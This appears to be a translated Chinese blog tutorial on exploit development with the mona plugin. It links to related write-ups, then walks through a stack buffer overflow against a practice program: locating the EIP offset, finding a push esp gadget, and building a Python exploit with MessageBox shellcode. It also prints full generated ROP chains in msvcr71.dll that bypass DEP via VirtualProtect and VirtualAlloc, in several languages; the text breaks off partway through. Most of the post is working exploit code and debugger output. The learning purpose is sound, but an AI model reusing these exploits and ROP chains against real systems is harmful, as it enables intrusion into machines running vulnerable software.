[Vulnerability exploit tools: mona series, part 4] mona hands-on series

PS: This post only collects existing posts on hands-on use of mona. Most come from internet search results, so only the links are given here.

From the Corelan team: a library of stable, universal ROP chains. Anyone working on bypassing DEP should take a look.

https://www.corelan.be/index.php/security/corelan-ropdb/

A very good library of stable ROP chains for all kinds of environments and DLLs.

Hands-on HeapSpray: writing an exploit for CVE-2012-1889

http://www.programlife.net/doc/CVE2012-1889.pdf

PS: It only uses mona's ROP feature, but the article is really good and well suited for learning.

Buffer overflow vulnerabilities in practice (1)

http://www.cnphp6.com/archives/45077

PS: This one uses several mona techniques. It is a simple stack overflow exploitation article; beginners may want to read it.

PCMan FTP Server 2.0.7 case analysis

http://www.hack80.com/thread-21688-1-1.html

PS: Like the previous one, this tests PCMan FTP, but this one is clearer and more straightforward.

Using the mona plugin in Immunity Debugger

http://www.hack80.com/thread-21042-1-1.html

PS: An introduction to several mona features.

Buffer overflow process study notes: FTP

http://bigtang.org/缓冲区漏洞过程学习笔记之FTP

PS: This one uses pattern_create/pattern_offset to locate EIP and the jmp feature to find a jmp esp.

[Translation] Using msvcr71.dll with mona.py for a universal DEP/ASLR bypass

http://bbs.pediy.com/showthread.php?t=139241&highlight=mona+py

PS: Translated by 后恋 on this forum; an excellent Corelan article that walks through how mona finds a ROP chain in msvcr71.

A simple stack overflow exploit with mona

Let me explain: this simple exploit is only meant as hands-on mona practice, to get the ball rolling.

Target: 1.exe (a practice demo our teacher gave us a while ago; msvcr71.dll is deliberately linked in so that ROP can be used)

Environment: Win7 x64

Tools: WinDbg (with mona plus) // if you don't have the tools yet, see the tutorial on configuring mona for WinDbg at http://bbs.pediy.com/showthread.php?t=198170

Screenshot of 1.exe running

Enter a string in the first textbox and click OK; the content of the first box is copied into the second box. The buffer overflows during this copy.

0x00 Starting mona in WinDbg

Open WinDbg and use it to open the 1.exe we want to debug.

In the command box at the bottom, enter .load pykd.pyd

Then enter !py mona (to check whether mona starts correctly)

mona started normally. (You can run !py mona update to update to the latest version of mona.)

Set the working folder:

!py mona config -set workingfolder c:\logs\%p

1.exe is not running yet. First enter g to let the program run so that our msvcr71.dll gets loaded, then break in again.

Enter !py mona modules to view information about the loaded modules

The parts underlined in red: neither our 1.exe nor msvcr71.dll has any protection features enabled.

0x01 Determining the offset (the offset that controls EIP)

First we locate the offset that controls EIP, using mona's pattern_create / pattern_offset features.

Generate the pattern with the command !py mona pattern_create 300 (creates a 300-byte pattern)

0:002> !py mona pattern_create 300

Hold on...

[+] Command used:

!py C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py pattern_create 300

Creating cyclic pattern of 300 bytes

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9

[+] Preparing output file 'pattern.txt'

- Creating working folder c:\logs\1

- Folder created

- (Re)setting logfile c:\logs\1\pattern.txt

Note: don't copy this pattern from the log window, it might be truncated !

It's better to open c:\logs\1\pattern.txt and copy the pattern from the file

Run 1.exe with the g command

Copy the string, paste it into the first box, and click OK

0:002> g

(ea8.c7c): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=00000001 ebx=00000001 ecx=0018f97c edx=00000030 esi=00423b40 edi=0018fe68

eip=33654132 esp=0018f860 ebp=0018f868 iopl=0 nv up ei pl nz na pe nc

cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206

33654132 ?? ???

WinDbg broke in. Note the value of EIP; we will use it below. Here it is 33654132.

Next we use pattern_offset to determine the offset

Use the command !py mona pattern_offset 33654132

0:000> !py mona pattern_offset 33654132

Hold on...

[+] Command used:

!py C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py pattern_offset 33654132

Looking for 2Ae3 in pattern of 500000 bytes

- Pattern 2Ae3 (0x33654132) found in cyclic pattern at position 128

Looking for 2Ae3 in pattern of 500000 bytes

Looking for 3eA2 in pattern of 500000 bytes

- Pattern 3eA2 not found in cyclic pattern (uppercase)

Looking for 2Ae3 in pattern of 500000 bytes

Looking for 3eA2 in pattern of 500000 bytes

- Pattern 3eA2 not found in cyclic pattern (lowercase)

[+] This mona.py action took 0:00:00.305000

So our offset is 128.
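As an added example (not from the post or from mona), here is a Python 3 reimplementation of the two steps just used: building the Aa0Aa1... cyclic pattern and locating the dword that landed in EIP, checked little-endian first and then reversed, the way mona's output above does. The constant and function names are my own; mona's switch to a larger character set for patterns longer than 20280 bytes is not modelled.

```python
import string
import struct

# Aa0Aa1...Zz9 gives 26*26*10 distinct triples before it would repeat; mona moves
# to a larger character set beyond that, which this example does not model.
MAX_PLAIN_PATTERN = 26 * 26 * 10 * 3  # 20280 bytes


def pattern_create(length):
    """Return the first `length` bytes of the cyclic pattern mona/Metasploit use."""
    if not 0 < length <= MAX_PLAIN_PATTERN:
        raise ValueError("length must be 1..%d" % MAX_PLAIN_PATTERN)
    parts = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                parts.append(upper + lower + digit)
                if len(parts) * 3 >= length:      # enough triples generated
                    return "".join(parts)[:length]
    return "".join(parts)[:length]


def pattern_offset(eip, length=MAX_PLAIN_PATTERN):
    """Locate the dword that ended up in EIP inside the pattern.

    `eip` is an int or the hex string WinDbg shows (e.g. "33654132").
    Returns (offset, matched_text, endianness), or None when the dword is not
    pattern text at all (e.g. 0xcccccccc once the offset has been verified)."""
    value = int(eip, 16) if isinstance(eip, str) else eip
    pattern = pattern_create(length)
    # Like mona: try the little-endian reading first ("2Ae3" for 0x33654132),
    # then the reversed one ("3eA2") in case the bytes were read big-endian.
    for endianness, fmt in (("little", "<I"), ("big", ">I")):
        try:
            needle = struct.pack(fmt, value).decode("ascii")
        except UnicodeDecodeError:
            return None
        pos = pattern.find(needle)
        if pos != -1:
            return pos, needle, endianness
    return None


if __name__ == "__main__":
    print(pattern_create(300))          # the 300-byte pattern shown in the post
    print(pattern_offset("33654132"))   # (128, '2Ae3', 'little')
```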

0x03 Verifying that the offset is correct

Construct the Python exploit script:

# Python 2: build the crash buffer and write it to crash.txt
junk = "A" * 128                # padding up to the saved return address (offset found by mona)
eip = "\xcc\xcc\xcc\xcc"        # lands in EIP; int3 bytes are easy to recognise in the debugger
nops = "\x90" * 20
shellcode = "\xcc" * 40         # placeholder shellcode: int3 so a hit is visible
exploit = junk + eip + nops + shellcode

# write the file
try:
    rst = open("crash.txt", 'w')
    rst.write(exploit)
    rst.close()
    print "OK"
except IOError:
    print "Error"

This script generates the file crash.txt, whose content is our exploit.

Layout: first 128 A's, then the cccccccc that controls EIP, followed by the nops and the shellcode.

If WinDbg breaks with EIP equal to cccccccc, that proves the offset we obtained is correct.

(fbc.5d4): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=00000001 ebx=00000001 ecx=0018f97c edx=00000030 esi=00423b40 edi=0018fe68

eip=cccccccc esp=0018f860 ebp=0018f868 iopl=0 nv up ei pl nz na pe nc

cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206

cccccccc ?? ???

EIP is indeed cccccccc now, which proves the offset mona gave is correct.

0x04 Using mona to find a jmp esp pointer

Next, let's look at the state of the stack

0:000> dd esp-10 L 40

0018f850 41414141 41414141 41414141 cccccccc

0018f860 90909090 90909090 90909090 90909090

0018f870 90909090 cccccccc cccccccc cccccccc

0018f880 cccccccc cccccccc cccccccc cccccccc

0018f890 cccccccc cccccccc cccccccc 00417e00

0:000> dd esp

0018f860 90909090 90909090 90909090 90909090

0018f870 90909090 cccccccc cccccccc cccccccc

0018f880 cccccccc cccccccc cccccccc cccccccc

0018f890 cccccccc cccccccc cccccccc 00417e00

0018f8a0 00000001 00000000 00000000 00000000

0018f8b0 00000001 0018fe68 00000000 0018f90c

0018f8c0 0041a440 00000001 00000000 00000000

0018f8d0 00000000 0018fe68 0018fe68 00000111

We can see that the nops and the shellcode sit right on the stack esp points to: a textbook jmp esp case.

Let's find a jmp esp

!py mona jmp -r esp -cpb "\x00"

0:000> !py mona jmp -r esp -cpb "\x00" //(this command searches for jmp esp and excludes addresses that contain 00, since 00 truncates the string)

Hold on...

[+] Command used:

!py C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py jmp -r esp -cpb \x00

---------- Mona command started on 2015-03-01 15:55:46 (v2.0, rev 554) ----------

[+] Processing arguments and criteria

- Pointer access level : X

- Bad char filter will be applied to pointers : \x00

[+] Generating module info table, hang on...

- Processing modules

- Done. Let's rock 'n roll.

[+] Querying 2 modules

- Querying module 1.exe

^ Memory access error in '!py mona jmp -r esp -cpb "\x00" '

** Unable to process searchPattern 'mov eax,esp # jmp eax'. **

- Querying module msvcr71.dll

^ Memory access error in '!py mona jmp -r esp -cpb "\x00" '

** Unable to process searchPattern 'mov eax,esp # jmp eax'. **

- Search complete, processing results

[+] Preparing output file 'jmp.txt'

- (Re)setting logfile c:\logs\1\jmp.txt

[+] Writing results to c:\logs\1\jmp.txt

- Number of pointers of type 'push esp # ret ' : 1

[+] Results :

0x7c345c30 | 0x7c345c30 : push esp # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [msvcr71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.3052.4 (C:\Users\old7\Desktop\test\New folder\msvcr71.dll)

Found a total of 1 pointers

[+] This mona.py action took 0:00:00.351000

Found one: 0x7c345c30 | 0x7c345c30 : push esp # ret

0x05 Assembling our final exploit

import struct

def little_endian(address):
    # pack a 32-bit address as 4 little-endian bytes
    return struct.pack("<I", address)

junk = "A" * 128
eip = little_endian(0x7c345c30)   # 0x7c345c30: push esp # ret in msvcr71.dll (acts like jmp esp)
nops = "\x90" * 20

# MessageBox shellcode, 113 bytes
shellcode = ""
shellcode += "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
shellcode += "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
shellcode += "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
shellcode += "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
shellcode += "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
shellcode += "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
shellcode += "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
shellcode += "\x49\x0b\x31\xc0\x51\x50\xff\xd7"

exploit = junk + eip + nops + shellcode

# write the file
try:
    rst = open("crash.txt", 'w')
    rst.write(exploit)
    rst.close()
    print "OK"
except IOError:
    print "Error"

Screenshot:

Next, let's do it again using ROP

0x06 Generating the ROP chain

Use mona's rop command directly:

!py mona rop -m "msvcr71.dll" -cpb "\x00"

This command tells mona to look for ROP chains within msvcr71.dll's address space and to avoid 0x00, which would truncate the string.

Wait a moment!

0:001> !py mona rop -m "msvcr71.dll" -cpb "\x00"

Hold on...

[+] Command used:

!py C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py rop -m msvcr71.dll -cpb \x00

---------- Mona command started on 2015-03-01 16:07:49 (v2.0, rev 554) ----------

[+] Processing arguments and criteria

- Pointer access level : X

- Only querying modules msvcr71.dll

- Bad char filter will be applied to pointers : \x00

[+] Generating module info table, hang on...

- Processing modules

- Done. Let's rock 'n roll.

[+] Preparing output file '_rop_progress_1.exe_3236.log'

- (Re)setting logfile c:\logs\1\_rop_progress_1.exe_3236.log

[+] Progress will be written to _rop_progress_1.exe_3236.log

[+] Maximum offset : 40

[+] (Minimum/optional maximum) stackpivot distance : 8

[+] Max nr of instructions : 6

[+] Split output into module rop files ? False

[+] Enumerating 22 endings in 1 module(s)...

- Querying module msvcr71.dll

- Search complete :

Ending : RETN 0x0C, Nr found : 2

Ending : RETN, Nr found : 2408

Ending : RETN 0x08, Nr found : 24

Ending : RETN 0x02, Nr found : 2

Ending : RETN 0x10, Nr found : 11

Ending : RETN 0x00, Nr found : 12

Ending : RETN 0x06, Nr found : 1

Ending : RETN 0x14, Nr found : 2

Ending : RETN 0x04, Nr found : 62

- Filtering and mutating 2524 gadgets

- Progress update : 500 / 2524 items processed (Sun 2015/03/01 04:07:56 PM) - (19%)

- Progress update : 1000 / 2524 items processed (Sun 2015/03/01 04:08:03 PM) - (39%)

- Progress update : 1500 / 2524 items processed (Sun 2015/03/01 04:08:10 PM) - (59%)

- Progress update : 2000 / 2524 items processed (Sun 2015/03/01 04:08:17 PM) - (79%)

- Progress update : 2500 / 2524 items processed (Sun 2015/03/01 04:08:24 PM) - (99%)

- Progress update : 2524 / 2524 items processed (Sun 2015/03/01 04:08:25 PM) - (100%)

[+] Creating suggestions list

[+] Processing suggestions

[+] Launching ROP generator

[+] Attempting to produce rop chain for VirtualProtect

Step 1/7: esi

[+] Searching from 0x7c340000 to 0x7c396000

Step 2/7: ebp

Step 3/7: ebx

Step 4/7: edx

Step 5/7: ecx

Step 6/7: edi

Step 7/7: eax

[+] Preparing output file 'msvcr71_virtualprotect.xml'

- (Re)setting logfile c:\logs\1\msvcr71_virtualprotect.xml

[+] Attempting to produce rop chain for VirtualAlloc

Step 1/7: esi

[+] Searching from 0x7c340000 to 0x7c396000

Step 2/7: ebp

Step 3/7: ebx

Step 4/7: edx

Step 5/7: ecx

Step 6/7: edi

Step 7/7: eax

[+] Preparing output file 'msvcr71_virtualalloc.xml'

- (Re)setting logfile c:\logs\1\msvcr71_virtualalloc.xml

[+] Preparing output file 'rop_chains.txt'

- (Re)setting logfile c:\logs\1\rop_chains.txt

[+] ROP chains written to file c:\logs\1\rop_chains.txt

################################################################################

Register setup for VirtualProtect() :

--------------------------------------------

EAX = NOP (0x90909090)

ECX = lpOldProtect (ptr to W address)

EDX = NewProtect (0x40)

EBX = dwSize

ESP = lPAddress (automatic)

EBP = ReturnTo (ptr to jmp esp)

ESI = ptr to VirtualProtect()

EDI = ROP NOP (RETN)

--- alternative chain ---

EAX = tr to &VirtualProtect()

ECX = lpOldProtect (ptr to W address)

EDX = NewProtect (0x40)

EBX = dwSize

ESP = lPAddress (automatic)

EBP = POP (skip 4 bytes)

ESI = ptr to JMP [EAX]

EDI = ROP NOP (RETN)

+ place ptr to "jmp esp" on stack, below PUSHAD

--------------------------------------------

ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :

----------------------------------------------------------

*** [ Ruby ] ***

def create_rop_chain()

# rop chain generated with mona.py - www.corelan.be

rop_gadgets =

[

0x7c375928, # POP EBP # RETN [msvcr71.dll]

0x7c375928, # skip 4 bytes [msvcr71.dll]

0x7c348495, # POP EAX # RETN [msvcr71.dll]

0xfffffdff, # Value to negate, will become 0x00000201

0x7c34d749, # NEG EAX # RETN [msvcr71.dll]

0x7c373ebf, # POP EBX # RETN [msvcr71.dll]

0xffffffff, #

0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]

0x7c35218e, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]

0x7c344f87, # POP EDX # RETN [msvcr71.dll]

0xffffffc0, # Value to negate, will become 0x00000040

0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]

0x7c36345b, # POP ECX # RETN [msvcr71.dll]

0x7c38baf2, # &Writable location [msvcr71.dll]

0x7c342953, # POP EDI # RETN [msvcr71.dll]

0x7c34d202, # RETN (ROP NOP) [msvcr71.dll]

0x7c34adf5, # POP ESI # RETN [msvcr71.dll]

0x7c3415a2, # JMP [EAX] [msvcr71.dll]

0x7c3647cc, # POP EAX # RETN [msvcr71.dll]

0x7c37a140, # ptr to &VirtualProtect() [IAT msvcr71.dll]

0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]

0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]

].flatten.pack("V*")

return rop_gadgets

end

# Call the ROP chain generator inside the 'exploit' function :

rop_chain = create_rop_chain()

*** [ C ] ***

#define CREATE_ROP_CHAIN(name, ...) \

int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \

unsigned int name[name##_length / sizeof(unsigned int)]; \

create_rop_chain(name, ##__VA_ARGS__);

int create_rop_chain(unsigned int *buf, unsigned int )

{

// rop chain generated with mona.py - www.corelan.be

unsigned int rop_gadgets[] = {

0x7c375928, // POP EBP // RETN [msvcr71.dll]

0x7c375928, // skip 4 bytes [msvcr71.dll]

0x7c348495, // POP EAX // RETN [msvcr71.dll]

0xfffffdff, // Value to negate, will become 0x00000201

0x7c34d749, // NEG EAX // RETN [msvcr71.dll]

0x7c373ebf, // POP EBX // RETN [msvcr71.dll]

0xffffffff, //

0x7c345255, // INC EBX // FPATAN // RETN [msvcr71.dll]

0x7c35218e, // ADD EBX,EAX // XOR EAX,EAX // INC EAX // RETN [msvcr71.dll]

0x7c344f87, // POP EDX // RETN [msvcr71.dll]

0xffffffc0, // Value to negate, will become 0x00000040

0x7c351eb1, // NEG EDX // RETN [msvcr71.dll]

0x7c36345b, // POP ECX // RETN [msvcr71.dll]

0x7c38baf2, // &Writable location [msvcr71.dll]

0x7c342953, // POP EDI // RETN [msvcr71.dll]

0x7c34d202, // RETN (ROP NOP) [msvcr71.dll]

0x7c34adf5, // POP ESI // RETN [msvcr71.dll]

0x7c3415a2, // JMP [EAX] [msvcr71.dll]

0x7c3647cc, // POP EAX // RETN [msvcr71.dll]

0x7c37a140, // ptr to &VirtualProtect() [IAT msvcr71.dll]

0x7c378c81, // PUSHAD // ADD AL,0EF // RETN [msvcr71.dll]

0x7c345c30, // ptr to 'push esp // ret ' [msvcr71.dll]

};

if(buf != NULL) {

memcpy(buf, rop_gadgets, sizeof(rop_gadgets));

};

return sizeof(rop_gadgets);

}

// use the 'rop_chain' variable after this call, it's just an unsigned int[]

CREATE_ROP_CHAIN(rop_chain, );

// alternatively just allocate a large enough buffer and get the rop chain, i.e.:

// unsigned int rop_chain[256];

// int rop_chain_length = create_rop_chain(rop_chain, );

*** [ Python ] ***

def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x7c375928,  # POP EBP # RETN [msvcr71.dll]
        0x7c375928,  # skip 4 bytes [msvcr71.dll]
        0x7c348495,  # POP EAX # RETN [msvcr71.dll]
        0xfffffdff,  # Value to negate, will become 0x00000201
        0x7c34d749,  # NEG EAX # RETN [msvcr71.dll]
        0x7c373ebf,  # POP EBX # RETN [msvcr71.dll]
        0xffffffff,  #
        0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll]
        0x7c35218e,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
        0x7c344f87,  # POP EDX # RETN [msvcr71.dll]
        0xffffffc0,  # Value to negate, will become 0x00000040
        0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll]
        0x7c36345b,  # POP ECX # RETN [msvcr71.dll]
        0x7c38baf2,  # &Writable location [msvcr71.dll]
        0x7c342953,  # POP EDI # RETN [msvcr71.dll]
        0x7c34d202,  # RETN (ROP NOP) [msvcr71.dll]
        0x7c34adf5,  # POP ESI # RETN [msvcr71.dll]
        0x7c3415a2,  # JMP [EAX] [msvcr71.dll]
        0x7c3647cc,  # POP EAX # RETN [msvcr71.dll]
        0x7c37a140,  # ptr to &VirtualProtect() [IAT msvcr71.dll]
        0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
        0x7c345c30,  # ptr to 'push esp # ret ' [msvcr71.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)  # the exploit must 'import struct'

rop_chain = create_rop_chain()

*** [ JavaScript ] ***

//rop chain generated with mona.py - www.corelan.be

rop_gadgets = unescape(

"%u5928%u7c37" + // 0x7c375928 : ,# POP EBP # RETN [msvcr71.dll]

"%u5928%u7c37" + // 0x7c375928 : ,# skip 4 bytes [msvcr71.dll]

"%u8495%u7c34" + // 0x7c348495 : ,# POP EAX # RETN [msvcr71.dll]

"%ufdff%uffff" + // 0xfffffdff : ,# Value to negate, will become 0x00000201

"%ud749%u7c34" + // 0x7c34d749 : ,# NEG EAX # RETN [msvcr71.dll]

"%u3ebf%u7c37" + // 0x7c373ebf : ,# POP EBX # RETN [msvcr71.dll]

"%uffff%uffff" + // 0xffffffff : ,#

"%u5255%u7c34" + // 0x7c345255 : ,# INC EBX # FPATAN # RETN [msvcr71.dll]

"%u218e%u7c35" + // 0x7c35218e : ,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]

"%u4f87%u7c34" + // 0x7c344f87 : ,# POP EDX # RETN [msvcr71.dll]

"%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040

"%u1eb1%u7c35" + // 0x7c351eb1 : ,# NEG EDX # RETN [msvcr71.dll]

"%u345b%u7c36" + // 0x7c36345b : ,# POP ECX # RETN [msvcr71.dll]

"%ubaf2%u7c38" + // 0x7c38baf2 : ,# &Writable location [msvcr71.dll]

"%u2953%u7c34" + // 0x7c342953 : ,# POP EDI # RETN [msvcr71.dll]

"%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [msvcr71.dll]

"%uadf5%u7c34" + // 0x7c34adf5 : ,# POP ESI # RETN [msvcr71.dll]

"%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [msvcr71.dll]

"%u47cc%u7c36" + // 0x7c3647cc : ,# POP EAX # RETN [msvcr71.dll]

"%ua140%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT msvcr71.dll]

"%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]

"%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [msvcr71.dll]

""); // :

--------------------------------------------------------------------------------------------------

################################################################################

Register setup for VirtualAlloc() :

--------------------------------------------

EAX = NOP (0x90909090)

ECX = flProtect (0x40)

EDX = flAllocationType (0x1000)

EBX = dwSize

ESP = lpAddress (automatic)

EBP = ReturnTo (ptr to jmp esp)

ESI = ptr to VirtualAlloc()

EDI = ROP NOP (RETN)

--- alternative chain ---

EAX = ptr to &VirtualAlloc()

ECX = flProtect (0x40)

EDX = flAllocationType (0x1000)

EBX = dwSize

ESP = lpAddress (automatic)

EBP = POP (skip 4 bytes)

ESI = ptr to JMP [EAX]

EDI = ROP NOP (RETN)

+ place ptr to "jmp esp" on stack, below PUSHAD

--------------------------------------------

ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] :

--------------------------------------------------------

*** [ Ruby ] ***

def create_rop_chain()

# rop chain generated with mona.py - www.corelan.be

rop_gadgets =

[

0x7c35cea2, # POP EBP # RETN [msvcr71.dll]

0x7c35cea2, # skip 4 bytes [msvcr71.dll]

0x7c3590be, # POP EAX # RETN [msvcr71.dll]

0xffffffff, # Value to negate, will become 0x00000001

0x7c34d749, # NEG EAX # RETN [msvcr71.dll]

0x7c341748, # POP EBX # RETN [msvcr71.dll]

0xffffffff, #

0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]

0x7c35218e, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]

0x7c344160, # POP EDX # RETN [msvcr71.dll]

0xffffefff, # Value to negate, destination value : 0x00001000

0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]

0x7c36e9bf, # DEC EDX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]

0x7c344f87, # POP EDX # RETN [msvcr71.dll]

0xffffffc0, # Value to negate, will become 0x00000040

0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]

0x7c375c69, # POP ECX # RETN [msvcr71.dll]

0xffffffff, #

0x7c354e83, # INC ECX # AND EAX,8000 # RETN [msvcr71.dll]

0x7c358f2a, # ADD ECX,EDX # ADD EAX,ECX # POP ESI # RETN [msvcr71.dll]

0x41414141, # Filler (compensate)

0x7c34272f, # POP EDI # RETN [msvcr71.dll]

0x7c34d202, # RETN (ROP NOP) [msvcr71.dll]

0x7c362b3e, # POP ESI # RETN [msvcr71.dll]

0x7c3415a2, # JMP [EAX] [msvcr71.dll]

0x7c37582e, # POP EAX # RETN [msvcr71.dll]

0x7c37a094, # ptr to &VirtualAlloc() [IAT msvcr71.dll]

0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]

0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]

].flatten.pack("V*")

return rop_gadgets

end

# Call the ROP chain generator inside the 'exploit' function :

rop_chain = create_rop_chain()

*** [ C ] ***

#define CREATE_ROP_CHAIN(name, ...) \

int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \

unsigned int name[name##_length / sizeof(unsigned int)]; \

create_rop_chain(name, ##__VA_ARGS__);

int create_rop_chain(unsigned int *buf, unsigned int )

{

// rop chain generated with mona.py - www.corelan.be

unsigned int rop_gadgets[] = {

0x7c35cea2, // POP EBP // RETN [msvcr71.dll]

0x7c35cea2, // skip 4 bytes [msvcr71.dll]

0x7c3590be, // POP EAX // RETN [msvcr71.dll]

0xffffffff, // Value to negate, will become 0x00000001

0x7c34d749, // NEG EAX // RETN [msvcr71.dll]

0x7c341748, // POP EBX // RETN [msvcr71.dll]

0xffffffff, //

0x7c345255, // INC EBX // FPATAN // RETN [msvcr71.dll]

0x7c35218e, // ADD EBX,EAX // XOR EAX,EAX // INC EAX // RETN [msvcr71.dll]

0x7c344160, // POP EDX // RETN [msvcr71.dll]

0xffffefff, // Value to negate, destination value : 0x00001000

0x7c351eb1, // NEG EDX // RETN [msvcr71.dll]

0x7c36e9bf, // DEC EDX // XOR EAX,EAX // INC EAX // RETN [msvcr71.dll]

0x7c344f87, // POP EDX // RETN [msvcr71.dll]

0xffffffc0, // Value to negate, will become 0x00000040

0x7c351eb1, // NEG EDX // RETN [msvcr71.dll]

0x7c375c69, // POP ECX // RETN [msvcr71.dll]

0xffffffff, //

0x7c354e83, // INC ECX // AND EAX,8000 // RETN [msvcr71.dll]

0x7c358f2a, // ADD ECX,EDX // ADD EAX,ECX // POP ESI // RETN [msvcr71.dll]

0x41414141, // Filler (compensate)

0x7c34272f, // POP EDI // RETN [msvcr71.dll]

0x7c34d202, // RETN (ROP NOP) [msvcr71.dll]

0x7c362b3e, // POP ESI // RETN [msvcr71.dll]

0x7c3415a2, // JMP [EAX] [msvcr71.dll]

0x7c37582e, // POP EAX // RETN [msvcr71.dll]

0x7c37a094, // ptr to &VirtualAlloc() [IAT msvcr71.dll]

0x7c378c81, // PUSHAD // ADD AL,0EF // RETN [msvcr71.dll]

0x7c345c30, // ptr to 'push esp // ret ' [msvcr71.dll]

};

if(buf != NULL) {

memcpy(buf, rop_gadgets, sizeof(rop_gadgets));

};

return sizeof(rop_gadgets);

}

// use the 'rop_chain' variable after this call, it's just an unsigned int[]

CREATE_ROP_CHAIN(rop_chain, );

// alternatively just allocate a large enough buffer and get the rop chain, i.e.:

// unsigned int rop_chain[256];

// int rop_chain_length = create_rop_chain(rop_chain, );

*** [ Python ] ***

def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x7c35cea2,  # POP EBP # RETN [msvcr71.dll]
        0x7c35cea2,  # skip 4 bytes [msvcr71.dll]
        0x7c3590be,  # POP EAX # RETN [msvcr71.dll]
        0xffffffff,  # Value to negate, will become 0x00000001
        0x7c34d749,  # NEG EAX # RETN [msvcr71.dll]
        0x7c341748,  # POP EBX # RETN [msvcr71.dll]
        0xffffffff,  #
        0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll]
        0x7c35218e,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
        0x7c344160,  # POP EDX # RETN [msvcr71.dll]
        0xffffefff,  # Value to negate, destination value : 0x00001000
        0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll]
        0x7c36e9bf,  # DEC EDX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
        0x7c344f87,  # POP EDX # RETN [msvcr71.dll]
        0xffffffc0,  # Value to negate, will become 0x00000040
        0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll]
        0x7c375c69,  # POP ECX # RETN [msvcr71.dll]
        0xffffffff,  #
        0x7c354e83,  # INC ECX # AND EAX,8000 # RETN [msvcr71.dll]
        0x7c358f2a,  # ADD ECX,EDX # ADD EAX,ECX # POP ESI # RETN [msvcr71.dll]
        0x41414141,  # Filler (compensate)
        0x7c34272f,  # POP EDI # RETN [msvcr71.dll]
        0x7c34d202,  # RETN (ROP NOP) [msvcr71.dll]
        0x7c362b3e,  # POP ESI # RETN [msvcr71.dll]
        0x7c3415a2,  # JMP [EAX] [msvcr71.dll]
        0x7c37582e,  # POP EAX # RETN [msvcr71.dll]
        0x7c37a094,  # ptr to &VirtualAlloc() [IAT msvcr71.dll]
        0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
